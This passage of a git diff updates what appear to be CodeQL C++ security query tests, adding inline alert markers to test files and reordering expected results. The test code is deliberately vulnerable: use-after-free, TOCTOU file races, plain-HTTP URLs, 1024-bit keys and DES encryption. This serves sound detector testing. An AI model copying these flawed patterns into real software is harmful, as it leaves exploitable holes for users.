test.cpp:46:18:46:26 | *http:// | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | -| test.cpp:110:21:110:40 | http://example.com | test.cpp:110:21:110:40 | *http://example.com | test.cpp:15:30:15:32 | *url | This URL may be constructed with the HTTP protocol. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref index c9c917ad0456..5a18a73768b9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/UseOfHttp.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-319/UseOfHttp.ql \ No newline at end of file +query: Security/CWE/CWE-319/UseOfHttp.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp index 573e021979d7..ba977d434481 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-319/UseOfHttp/test.cpp @@ -12,7 +12,7 @@ void openUrl(const char *url) { // ... - host myHost = gethostbyname(url); + host myHost = gethostbyname(url); // $ Sink // ... } @@ -21,19 +21,19 @@ void doNothing(char *url) { } -const char *url_g = "http://example.com"; // BAD +const char *url_g = "http://example.com"; // BAD // $ Alert void test() { - openUrl("http://example.com"); // BAD + openUrl("http://example.com"); // BAD // $ Alert openUrl("https://example.com"); // GOOD (https) openUrl("http://localhost/example"); // GOOD (localhost) openUrl("https://localhost/example"); // GOOD (https, localhost) doNothing("http://example.com"); // GOOD (URL not used) { - const char *url_l = "http://example.com"; // BAD - const char *urls[] = { "http://example.com" }; // BAD + const char *url_l = "http://example.com"; // BAD // $ Alert + const char *urls[] = { "http://example.com" }; // BAD // $ Alert openUrl(url_g); openUrl(url_l); @@ -43,7 +43,7 @@ void test() { char buffer[1024]; - strcpy(buffer, "http://"); // BAD + strcpy(buffer, "http://"); // BAD // $ Alert strcat(buffer, "example.com"); openUrl(buffer); @@ -107,7 +107,7 @@ void test4(char *url) void test5() { - char *url_string = "http://example.com"; // BAD + char *url_string = "http://example.com"; // BAD // $ Alert char *ptr; ptr = strstr(url_string, "https://"); // GOOD (https) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected index ca20f65bec72..4f1a66d4cdf5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.expected @@ -1,10 +1,10 @@ +#select +| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | +| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | +| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | edges nodes | test.cpp:34:45:34:48 | 1024 | semmle.label | 1024 | | test.cpp:35:49:35:52 | 1024 | semmle.label | 1024 | | test.cpp:37:43:37:46 | 1024 | semmle.label | 1024 | subpaths -#select -| test.cpp:34:5:34:38 | call to EVP_PKEY_CTX_set_dsa_paramgen_bits | test.cpp:34:45:34:48 | 1024 | test.cpp:34:45:34:48 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:34:45:34:48 | 1024 | 1024 | -| test.cpp:35:5:35:42 | call to EVP_PKEY_CTX_set_dh_paramgen_prime_len | test.cpp:35:49:35:52 | 1024 | test.cpp:35:49:35:52 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:35:49:35:52 | 1024 | 1024 | -| test.cpp:37:5:37:36 | call to EVP_PKEY_CTX_set_rsa_keygen_bits | test.cpp:37:43:37:46 | 1024 | test.cpp:37:43:37:46 | 1024 | The key size $@ is less than the recommended key size of 2048 bits. | test.cpp:37:43:37:46 | 1024 | 1024 | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref index e869f87150a8..790ce8b27187 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/InsufficientKeySize.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-326/InsufficientKeySize.ql \ No newline at end of file +query: Security/CWE/CWE-326/InsufficientKeySize.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp index 18780fc05c0f..5e606f46baf4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-326/test.cpp @@ -31,8 +31,8 @@ void test1(EVP_PKEY_CTX *ctx) { EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 2048); // low key sizes - EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, 1024); - EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, 1024); + EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, 1024); // $ Alert + EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, 1024); // $ Alert // RSA sets bits per-key rather than with parameters - EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 1024); + EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, 1024); // $ Alert } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref index 8424dee1a9b6..ead42dd0386b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-327/BrokenCryptoAlgorithm.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-327/BrokenCryptoAlgorithm.ql \ No newline at end of file +query: Security/CWE/CWE-327/BrokenCryptoAlgorithm.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp index 91af0f7eede2..2ab9fc8457d8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test.cpp @@ -35,7 +35,7 @@ void my_implementation6(const char *str); void test_macros(void *data, size_t amount, const char *str) { - ENCRYPT_WITH_DES(data, amount); // BAD + ENCRYPT_WITH_DES(data, amount); // BAD // $ Alert ENCRYPT_WITH_RC2(data, amount); // BAD ENCRYPT_WITH_AES(data, amount); // GOOD (good algorithm) ENCRYPT_WITH_3DES(data, amount); // BAD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp index 95fc532c842d..9c8eb0933ed2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-327/test2.cpp @@ -46,7 +46,7 @@ void encrypt_bad(char *data, size_t amount, keytype key, int algo) { case ALGO_DES: { - my_des_implementation(data, amount, key); // BAD + my_des_implementation(data, amount, key); // BAD // $ Alert } break; case ALGO_AES: diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref index c7d2e9c45f4b..cbced86ff2e2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/TOCTOUFilesystemRace.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-367/TOCTOUFilesystemRace.ql \ No newline at end of file +query: Security/CWE/CWE-367/TOCTOUFilesystemRace.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp index 96425debc7c2..4fb08a116b94 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-367/semmle/test2.cpp @@ -66,7 +66,7 @@ void test2_1(const char *path) if (stat(path, &buf)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -80,7 +80,7 @@ void test2_2(const char *path) stat(path, &buf); if (buf.foo > 0) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -95,7 +95,7 @@ void test2_3(const char *path) stat(path, buf_ptr); if (buf_ptr->foo > 0) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -112,7 +112,7 @@ void test2_4(const char *path) stat(path, &buf); if (stat_condition(&buf)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -127,7 +127,7 @@ void test2_5(const char *path) stat(path, buf_ptr); if (stat_condition(buf_ptr)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert } // ... @@ -154,7 +154,7 @@ void test2_7(const char *path, int arg) if (stat(path, &buf)) { - f = open(path, arg); // BAD + f = open(path, arg); // BAD // $ Alert } // ... @@ -167,7 +167,7 @@ void test2_8(const char *path, int arg) if (lstat(path, &buf)) { - f = open(path, arg); // BAD + f = open(path, arg); // BAD // $ Alert } // ... @@ -206,7 +206,7 @@ void test2_11(const char *path, int arg) if (stat(path, &buf)) { - f = open(path, arg); // GOOD (here stat is just a redundant check that the file exists / path is valid, confirmed by the return value of open) [FALSE POSITIVE] + f = open(path, arg); // GOOD (here stat is just a redundant check that the file exists / path is valid, confirmed by the return value of open) [FALSE POSITIVE] // $ Alert if (f == -1) { // handle error @@ -225,7 +225,7 @@ void test2_12(const char *path, int arg) { if (buf.foo == 11) // check a property of the file { - f = open(path, arg); // BAD + f = open(path, arg); // BAD // $ Alert if (f == -1) { // handle error @@ -246,7 +246,7 @@ void test2_13(const char *path, int arg) return; } - f = fopen(path, "wt"); // BAD + f = fopen(path, "wt"); // BAD // $ Alert // ... } @@ -294,7 +294,7 @@ void test4_1(const char *path) fclose(f); - chmod(path, 0); // BAD + chmod(path, 0); // BAD // $ Alert } } @@ -326,7 +326,7 @@ void test6_1(const char *path) if (access(path)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert // ... } @@ -352,7 +352,7 @@ void test6_3(const char *path) if (!access(path)) { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert // ... } @@ -366,7 +366,7 @@ void test6_4(const char *path) { // ... } else { - f = fopen(path, "r"); // BAD + f = fopen(path, "r"); // BAD // $ Alert // ... } @@ -397,7 +397,7 @@ void test7_1(const char *path) fclose(f); - chmod(path, 1234); // BAD + chmod(path, 1234); // BAD // $ Alert } } @@ -405,7 +405,7 @@ void test7_1(const char *path1, const char *path2) { if (!rename(path1, path2)) { - chmod(path2, 1234); // BAD + chmod(path2, 1234); // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref index fb2d78f87dfe..b0ce57b346f8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/IteratorToExpiredContainer.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-416/IteratorToExpiredContainer.ql +query: Security/CWE/CWE-416/IteratorToExpiredContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp index d4e3c5b269ae..fe30cb863a46 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/IteratorToExpiredContainer/test.cpp @@ -677,10 +677,10 @@ std::vector> return_self_by_value(const std::vector& v) { } std::vector& ref_to_first_in_returnValue_1() { - return returnValue()[0]; // BAD + return returnValue()[0]; // BAD // $ Alert } std::vector& ref_to_first_in_returnValue_2() { @@ -732,7 +732,7 @@ std::vector& ref_to_first_in_returnValue_2() { } std::vector& ref_to_first_in_returnValue_3() { - return returnValue()[0]; // BAD + return returnValue()[0]; // BAD // $ Alert } std::vector first_in_returnValue_1() { @@ -854,7 +854,7 @@ struct PlusPlusReturnByValueIterator void test7() { PlusPlusReturnByValueIterator it; - it.operator++(); // GOOD [FALSE POSITIVE] + it.operator++(); // GOOD [FALSE POSITIVE] // $ Alert it.begin(); } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected index b7decda26517..670caa2291c6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.expected @@ -1,3 +1,18 @@ +#select +| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | +| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | +| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | +| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | +| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | +| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | +| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. | test.cpp:181:2:181:5 | call to free | call to free | +| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. | test.cpp:192:2:192:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | +| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | +| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | +| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | +| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | edges | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | provenance | | | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | provenance | | @@ -58,18 +73,3 @@ nodes | test.cpp:255:9:255:10 | *i2 [data] | semmle.label | *i2 [data] | | test.cpp:255:13:255:16 | data | semmle.label | data | subpaths -#select -| test.cpp:41:6:41:9 | data | test.cpp:39:7:39:10 | pointer to free output argument | test.cpp:41:6:41:9 | data | Memory may have been previously freed by $@. | test.cpp:39:2:39:5 | call to free | call to free | -| test.cpp:79:7:79:10 | data | test.cpp:75:7:75:10 | pointer to free output argument | test.cpp:79:7:79:10 | data | Memory may have been previously freed by $@. | test.cpp:75:2:75:5 | call to free | call to free | -| test.cpp:108:6:108:9 | data | test.cpp:106:7:106:10 | pointer to free output argument | test.cpp:108:6:108:9 | data | Memory may have been previously freed by $@. | test.cpp:106:2:106:5 | call to free | call to free | -| test.cpp:119:6:119:9 | data | test.cpp:116:7:116:10 | pointer to free output argument | test.cpp:119:6:119:9 | data | Memory may have been previously freed by $@. | test.cpp:116:2:116:5 | call to free | call to free | -| test.cpp:130:6:130:9 | data | test.cpp:127:7:127:10 | pointer to free output argument | test.cpp:130:6:130:9 | data | Memory may have been previously freed by $@. | test.cpp:127:2:127:5 | call to free | call to free | -| test.cpp:165:2:165:2 | c | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:165:2:165:2 | c | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:166:3:166:4 | * ... | test.cpp:164:9:164:9 | pointer to operator delete output argument | test.cpp:166:3:166:4 | * ... | Memory may have been previously freed by $@. | test.cpp:164:2:164:10 | delete | delete | -| test.cpp:186:6:186:9 | data | test.cpp:181:7:181:10 | pointer to free output argument | test.cpp:186:6:186:9 | data | Memory may have been previously freed by $@. | test.cpp:181:2:181:5 | call to free | call to free | -| test.cpp:197:6:197:9 | data | test.cpp:192:7:192:10 | pointer to free output argument | test.cpp:197:6:197:9 | data | Memory may have been previously freed by $@. | test.cpp:192:2:192:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:203:7:203:10 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:203:2:203:5 | call to free | call to free | -| test.cpp:209:6:209:9 | data | test.cpp:207:8:207:11 | pointer to free output argument | test.cpp:209:6:209:9 | data | Memory may have been previously freed by $@. | test.cpp:207:3:207:6 | call to free | call to free | -| test.cpp:217:6:217:6 | x | test.cpp:216:9:216:9 | pointer to operator delete output argument | test.cpp:217:6:217:6 | x | Memory may have been previously freed by $@. | test.cpp:216:2:216:9 | delete | delete | -| test.cpp:248:12:248:15 | data | test.cpp:243:7:243:16 | pointer to free output argument | test.cpp:248:12:248:15 | data | Memory may have been previously freed by $@. | test.cpp:243:2:243:5 | call to free | call to free | -| test.cpp:255:13:255:16 | data | test.cpp:250:7:250:17 | pointer to free output argument | test.cpp:255:13:255:16 | data | Memory may have been previously freed by $@. | test.cpp:250:2:250:5 | call to free | call to free | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref index c0ef8616cdc1..096090964894 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/UseAfterFree.qlref @@ -1 +1,2 @@ -Critical/UseAfterFree.ql +query: Critical/UseAfterFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp index deac38663362..251b936cc11c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseAfterFree/test.cpp @@ -36,9 +36,9 @@ void test1() char* data; data = (char *)malloc(100*sizeof(char)); use_if_nonzero(data); // GOOD - free(data); + free(data); // $ Source use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void test2() @@ -72,11 +72,11 @@ void test4() { char* data; data = (char *)malloc(100*sizeof(char)); - free(data); + free(data); // $ Source if (data) { use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } } @@ -103,9 +103,9 @@ void test6() char *data, *data2; data = (char *)malloc(100*sizeof(char)); data2 = data; - free(data); + free(data); // $ Source use_if_nonzero(data2); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void test7() @@ -113,10 +113,10 @@ void test7() char *data, *data2; data = (char *)malloc(100*sizeof(char)); data2 = data; - free(data); + free(data); // $ Source data2 = NULL; use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void test8() @@ -124,10 +124,10 @@ void test8() char *data, *data2; data2 = (char *)malloc(100*sizeof(char)); data = data2; - free(data); + free(data); // $ Source data2 = NULL; use_if_nonzero(data); // BAD [NOT DETECTED] - use(data); // BAD + use(data); // BAD // $ Alert } void noReturnWrapper() { noReturn(); } @@ -161,9 +161,9 @@ class myClass void test11() { myClass* c = new myClass(); - delete(c); - c->myMethod(); // BAD - (*c).myMethod(); // BAD + delete(c); // $ Source + c->myMethod(); // BAD // $ Alert + (*c).myMethod(); // BAD // $ Alert } template T test() @@ -178,43 +178,43 @@ template T test() void test12(int count) { char* data = NULL; - free(data); + free(data); // $ Source for (int i = 0; i < count; i++) { data = NULL; } - use(data); // BAD + use(data); // BAD // $ Alert } void test13() { char* data = NULL; - free(data); + free(data); // $ Source for (int i = 0; i < 2; i++) { data = NULL; } - use(data); // GOOD [FALSE POSITIVE] + use(data); // GOOD [FALSE POSITIVE] // $ Alert } void test14() { char* data = NULL; - free(data); + free(data); // $ Source for (int i = 0; i < 2; i++) { data = NULL; - free(data); + free(data); // $ Source } - use(data); // BAD + use(data); // BAD // $ Alert } template T test15() { T* x; use(x); // GOOD - delete x; - use(x); // BAD [NOT DETECTED] + delete x; // $ Source + use(x); // BAD [NOT DETECTED] // $ Alert } void test15runner(void) { @@ -240,17 +240,17 @@ struct myStruct { }; void malloc_after_free(myStruct *s) { - free(s->i1.data); + free(s->i1.data); // $ Source s->i1.data = (char *)malloc(100*sizeof(char)); if (s->i1.data == 0) { return; } - use(s->i1.data); // GOOD [FALSE POSITIVE] + use(s->i1.data); // GOOD [FALSE POSITIVE] // $ Alert - free(s->i2->data); + free(s->i2->data); // $ Source s->i2->data = (char *)malloc(100*sizeof(char)); if (s->i2->data == 0) { return; } - use(s->i2->data); // GOOD [FALSE POSITIVE] + use(s->i2->data); // GOOD [FALSE POSITIVE] // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref index a69a1a7f4e57..a367b49f59d6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/UseOfStringAfterLifetimeEnds.qlref @@ -1,2 +1,2 @@ - -Security/CWE/CWE-416/UseOfStringAfterLifetimeEnds.ql \ No newline at end of file +query: Security/CWE/CWE-416/UseOfStringAfterLifetimeEnds.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp index 4b3d934088d7..ebd098315a29 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfStringAfterLifetimeEnds/test.cpp @@ -162,11 +162,11 @@ void call_by_cref(const S&); void call(const char*); const char* test1(bool b1, bool b2) { - auto s1 = std::string("hello").c_str(); // BAD - auto s2 = b1 ? std::string("hello").c_str() : ""; // BAD - auto s3 = b2 ? "" : std::string("hello").c_str(); // BAD + auto s1 = std::string("hello").c_str(); // BAD // $ Alert + auto s2 = b1 ? std::string("hello").c_str() : ""; // BAD // $ Alert + auto s3 = b2 ? "" : std::string("hello").c_str(); // BAD // $ Alert const char* s4; - s4 = std::string("hello").c_str(); // BAD + s4 = std::string("hello").c_str(); // BAD // $ Alert call(std::string("hello").c_str()); // GOOD call(b1 ? std::string("hello").c_str() : ""); // GOOD @@ -175,24 +175,24 @@ const char* test1(bool b1, bool b2) { call_by_cref({ std::string("hello").c_str() }); // GOOD std::vector v1; - v1.push_back(std::string("hello").c_str()); // BAD + v1.push_back(std::string("hello").c_str()); // BAD // $ Alert std::vector v2; - v2.push_back({ std::string("hello").c_str() }); // BAD + v2.push_back({ std::string("hello").c_str() }); // BAD // $ Alert - S s5[] = { { std::string("hello").c_str() } }; // BAD + S s5[] = { { std::string("hello").c_str() } }; // BAD // $ Alert char c = std::string("hello").c_str()[0]; // GOOD - auto s6 = std::string("hello").data(); // BAD - auto s7 = b1 ? std::string("hello").data() : ""; // BAD - auto s8 = b2 ? "" : std::string("hello").data(); // BAD + auto s6 = std::string("hello").data(); // BAD // $ Alert + auto s7 = b1 ? std::string("hello").data() : ""; // BAD // $ Alert + auto s8 = b2 ? "" : std::string("hello").data(); // BAD // $ Alert char* s9; - s9 = std::string("hello").data(); // BAD + s9 = std::string("hello").data(); // BAD // $ Alert - const char* s13 = b1 ? std::string("hello").c_str() : s1; // BAD + const char* s13 = b1 ? std::string("hello").c_str() : s1; // BAD // $ Alert - return std::string("hello").c_str(); // BAD + return std::string("hello").c_str(); // BAD // $ Alert } void test2(bool b1, bool b2) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref index 4c613e5c5acc..c2d7ade08561 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/UseOfUniquePointerAfterLifetimeEnds.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-416/UseOfUniquePointerAfterLifetimeEnds.ql \ No newline at end of file +query: Security/CWE/CWE-416/UseOfUniquePointerAfterLifetimeEnds.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp index 18cc66b83675..f133f80206a1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-416/semmle/tests/UseOfUniquePtrAfterLifetimeEnds/test.cpp @@ -153,14 +153,14 @@ std::unique_ptr get_unique_ptr(); const S* test1(bool b1, bool b2) { auto s1 = *get_unique_ptr(); // GOOD - auto s1a = &*get_unique_ptr(); // BAD - auto s1b = get_unique_ptr().get(); // BAD + auto s1a = &*get_unique_ptr(); // BAD // $ Alert + auto s1b = 